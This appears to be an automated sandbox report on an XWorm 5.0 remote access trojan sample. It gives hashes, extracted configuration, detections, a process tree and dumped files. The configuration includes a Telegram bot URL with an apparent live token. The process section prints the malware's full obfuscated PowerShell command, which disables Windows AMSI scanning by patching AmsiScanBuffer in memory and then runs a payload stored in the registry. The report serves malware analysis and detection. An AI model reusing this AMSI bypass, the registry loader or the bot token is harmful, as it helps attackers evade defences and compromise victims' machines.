xworm | c7432706814d6536d4d4ced016274883a81d79fd18a85d7af1d54f690d4fe4bc

Analysis

max time kernel
0s
platform
windows11-21h2_x64
resource
win11-20231222-en
resource tags

arch:x64arch:x86image:win11-20231222-enlocale:en-usos:windows11-21h2-x64system
submitted
28/01/2024, 22:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Project.Nova.Manager.exe
Size

257KB
MD5

26eb1cb8c1151f6f6c9896bc1e866d55
SHA1

3aa45f36911679e61e0eab7742c07868da6347ad
SHA256

c7432706814d6536d4d4ced016274883a81d79fd18a85d7af1d54f690d4fe4bc
SHA512

95f0d1b79d3455b55912a3e4ef87dada9473f13546b967f112eb4c8ac7f34c5cc5089f6f6b2ebe2c7f35dee42b40033b2872f087e48901202d5f6e0db6cc0473
SSDEEP

6144:iSncRl9e39cQpsO4jajCIvpe/ZNQZuhfLguQ00KHTl:P4TJjJIkhCP27H

Score

10^/10

xworm rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

O0ZX0px0G0o1uOFK

Attributes

Install_directory
%ProgramData%
install_file
$77svchost.exe
telegram
https://api.telegram.org/bot6094198209:AAGtbuJi6hBqVBpkxn3UzVsVOtCJjMn1cjE

aes.plain

Signatures

Detect Xworm Payload 3 IoCs

resource	yara_rule
behavioral1/files/0x000900000002a724-4.dat	family_xworm
behavioral1/files/0x000900000002a724-11.dat	family_xworm
behavioral1/memory/3512-19-0x0000000000A90000-0x0000000000AA0000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

C:\Users\Admin\AppData\Local\Temp\Project.Nova.Manager.exe
"C:\Users\Admin\AppData\Local\Temp\Project.Nova.Manager.exe"
1⤵
PID:1768
- C:\Users\Admin\AppData\Local\Temp\INSTALL.EXE
  "C:\Users\Admin\AppData\Local\Temp\INSTALL.EXE"
  2⤵
  PID:3708
- C:\Users\Admin\AppData\Local\Temp\$77SVCHOST.EXE
  "C:\Users\Admin\AppData\Local\Temp\$77SVCHOST.EXE"
  2⤵
  PID:3512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:SBarsFtjfKMx{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$qQXKMqNkrKEUtJ,[Parameter(Position=1)][Type]$hmusnYsVML)$PMqIELVMIGM=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'fl'+'e'+''+[Char](99)+''+[Char](116)+'e'+'d'+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+'e'+[Char](109)+'or'+'y'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType('M'+'y'+'D'+[Char](101)+''+'l'+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+[Char](84)+'y'+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+'P'+'ub'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+'l'+'e'+'d,'+'A'+'n'+'s'+'i'+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+'s,'+'A'+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+''+'l'+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$PMqIELVMIGM.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+'N'+'a'+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+'g'+','+[Char](80)+''+'u'+''+[Char](98)+'l'+'i'+'c',[Reflection.CallingConventions]::Standard,$qQXKMqNkrKEUtJ).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+'nage'+[Char](100)+'');$PMqIELVMIGM.DefineMethod('I'+'n'+''+'v'+'o'+[Char](107)+''+'e'+'',''+[Char](80)+''+'u'+'bl'+'i'+''+[Char](99)+','+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+'yS'+[Char](105)+'g'+[Char](44)+''+'N'+''+'e'+''+'w'+''+[Char](83)+'lo'+'t'+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+'a'+[Char](108)+'',$hmusnYsVML,$qQXKMqNkrKEUtJ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+'m'+'e'+','+'M'+''+'a'+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $PMqIELVMIGM.CreateType();}$nzFzaPusSWSUS=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+'m'+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')}).GetType('M'+'i'+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+''+'W'+'in32'+'.'+'U'+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+'e'+'N'+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+'tho'+[Char](100)+''+'s'+'');$OouHARyjxPiUuH=$nzFzaPusSWSUS.GetMethod('G'+[Char](101)+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+'c'+[Char](65)+'ddr'+'e'+'ss',[Reflection.BindingFlags]('Pu'+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+'S'+'t'+''+[Char](97)+''+'t'+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ehyxguWNiuqqyJwqzMb=SBarsFtjfKMx @([String])([IntPtr]);$SPLFhUMAswpXVZNSbyBBJl=SBarsFtjfKMx @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$FvhiQvVvOap=$nzFzaPusSWSUS.GetMethod('G'+'e'+''+'t'+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+''+[Char](72)+'a'+'n'+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('ke'+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$FXPNyIDeHuUFIO=$OouHARyjxPiUuH.Invoke($Null,@([Object]$FvhiQvVvOap,[Object](''+'L'+'o'+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+'ra'+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$iAJnNlkgSItwPfQmH=$OouHARyjxPiUuH.Invoke($Null,@([Object]$FvhiQvVvOap,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+'u'+'a'+''+[Char](108)+''+[Char](80)+''+'r'+'o'+[Char](116)+''+'e'+''+'c'+''+'t'+'')));$cNHYZis=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FXPNyIDeHuUFIO,$ehyxguWNiuqqyJwqzMb).Invoke('a'+[Char](109)+''+[Char](115)+'i'+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$zkmThCzsssMFxXGYE=$OouHARyjxPiUuH.Invoke($Null,@([Object]$cNHYZis,[Object](''+'A'+'m'+[Char](115)+'i'+[Char](83)+''+'c'+''+[Char](97)+''+[Char](110)+''+[Char](66)+'u'+'f'+''+[Char](102)+''+'e'+''+[Char](114)+'')));$xpSCfIMKfE=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($iAJnNlkgSItwPfQmH,$SPLFhUMAswpXVZNSbyBBJl).Invoke($zkmThCzsssMFxXGYE,[uint32]8,4,[ref]$xpSCfIMKfE);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$zkmThCzsssMFxXGYE,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($iAJnNlkgSItwPfQmH,$SPLFhUMAswpXVZNSbyBBJl).Invoke($zkmThCzsssMFxXGYE,[uint32]8,0x20,[ref]$xpSCfIMKfE);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'OF'+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+'7'+'7'+''+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"
1⤵
PID:3096

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{53b4b5f4-fddd-4ba6-925d-25aa80b1bc9a}
1⤵
PID:3592

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:928

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\$77SVCHOST.EXE

Filesize
20KB

MD5
52746bc7906dc5e25eef860474c48744

SHA1
466b1c138fe71488f1175ae6fda7f09960ec4857

SHA256
a4dbe789923dc8a8d274c8323ffef831c631a768f95cb7b787c38e074a615ce6

SHA512
c90649e7727207e68654866e3180acc1210d724cbacb46e9a93a0a3c07d5bbbd5fb895d04b4d8e41707c50a0c4dcf6083a7e1fb6b8b32fef48c520fc85a2956c

Download Submit
C:\Users\Admin\AppData\Local\Temp\$77SVCHOST.EXE

Filesize
37KB

MD5
0a9651832b02e1a52ae0d50cfdc957fe

SHA1
3b571a344795847880c6d435d0ca7b8b404bf68e

SHA256
75999b72d08bee4d4e797fee92270cc41d438256239129a9a6f76bd470f999c5

SHA512
31600c4b235cd24d5d07596c3fcecdbb6fc2d9e8b7026220fd2542d085ca81dad48f58b2527eaa72d08bb63f9bf162c21d7419a48776c6d759c54eb38e0ead77

Download Submit
C:\Users\Admin\AppData\Local\Temp\INSTALL.EXE

Filesize
162KB

MD5
152e3f07bbaf88fb8b097ba05a60df6e

SHA1
c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

SHA256
a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

SHA512
2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

Download Submit
C:\Windows\Temp\__PSScriptPolicyTest_kjjvatsh.0kj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/432-107-0x0000028ABBC90000-0x0000028ABBCBB000-memory.dmp

Filesize
172KB

Download
memory/432-99-0x0000028ABBC90000-0x0000028ABBCBB000-memory.dmp

Filesize
172KB

Download
memory/636-54-0x0000020296680000-0x00000202966AB000-memory.dmp

Filesize
172KB

Download
memory/636-66-0x00007FFF262A4000-0x00007FFF262A5000-memory.dmp

Filesize
4KB

Download
memory/636-55-0x0000020296680000-0x00000202966AB000-memory.dmp

Filesize
172KB

Download
memory/636-63-0x0000020296680000-0x00000202966AB000-memory.dmp

Filesize
172KB

Download
memory/636-67-0x00007FFF262A6000-0x00007FFF262A7000-memory.dmp

Filesize
4KB

Download
memory/636-53-0x0000020296650000-0x0000020296675000-memory.dmp

Filesize
148KB

Download
memory/684-79-0x00007FFEE6290000-0x00007FFEE62A0000-memory.dmp

Filesize
64KB

Download
memory/684-70-0x000001C0F7F00000-0x000001C0F7F2B000-memory.dmp

Filesize
172KB

Download
memory/684-78-0x000001C0F7F00000-0x000001C0F7F2B000-memory.dmp

Filesize
172KB

Download
memory/684-80-0x00007FFF262A4000-0x00007FFF262A5000-memory.dmp

Filesize
4KB

Download
memory/684-82-0x00007FFF262A3000-0x00007FFF262A4000-memory.dmp

Filesize
4KB

Download
memory/684-83-0x00007FFF262A6000-0x00007FFF262A7000-memory.dmp

Filesize
4KB

Download
memory/996-95-0x00007FFEE6290000-0x00007FFEE62A0000-memory.dmp

Filesize
64KB

Download
memory/996-86-0x0000024743D20000-0x0000024743D4B000-memory.dmp

Filesize
172KB

Download
memory/996-94-0x0000024743D20000-0x0000024743D4B000-memory.dmp

Filesize
172KB

Download
memory/3096-29-0x000002A269C50000-0x000002A269C60000-memory.dmp

Filesize
64KB

Download
memory/3096-33-0x000002A269C50000-0x000002A269C60000-memory.dmp

Filesize
64KB

Download
memory/3096-36-0x00007FFF24450000-0x00007FFF2450D000-memory.dmp

Filesize
756KB

Download
memory/3096-121-0x00007FFF05020000-0x00007FFF05AE2000-memory.dmp

Filesize
10.8MB

Download
memory/3096-64-0x00007FFF26200000-0x00007FFF26409000-memory.dmp

Filesize
2.0MB

Download
memory/3096-49-0x00007FFF24450000-0x00007FFF2450D000-memory.dmp

Filesize
756KB

Download
memory/3096-30-0x000002A269C50000-0x000002A269C60000-memory.dmp

Filesize
64KB

Download
memory/3096-26-0x00007FFF05020000-0x00007FFF05AE2000-memory.dmp

Filesize
10.8MB

Download
memory/3096-35-0x00007FFF26200000-0x00007FFF26409000-memory.dmp

Filesize
2.0MB

Download
memory/3096-32-0x000002A26A2B0000-0x000002A26A2D2000-memory.dmp

Filesize
136KB

Download
memory/3096-34-0x000002A26A660000-0x000002A26A68A000-memory.dmp

Filesize
168KB

Download
memory/3512-65-0x00007FFF05020000-0x00007FFF05AE2000-memory.dmp

Filesize
10.8MB

Download
memory/3512-20-0x00007FFF05020000-0x00007FFF05AE2000-memory.dmp

Filesize
10.8MB

Download
memory/3512-19-0x0000000000A90000-0x0000000000AA0000-memory.dmp

Filesize
64KB

Download
memory/3512-133-0x00007FFF05020000-0x00007FFF05AE2000-memory.dmp

Filesize
10.8MB

Download
memory/3592-110-0x00007FFF26200000-0x00007FFF26409000-memory.dmp

Filesize
2.0MB

Download
memory/3592-46-0x00007FFF26200000-0x00007FFF26409000-memory.dmp

Filesize
2.0MB

Download
memory/3592-39-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3592-38-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3592-37-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3592-48-0x00007FFF24450000-0x00007FFF2450D000-memory.dmp

Filesize
756KB

Download
memory/3592-41-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3592-43-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3592-50-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads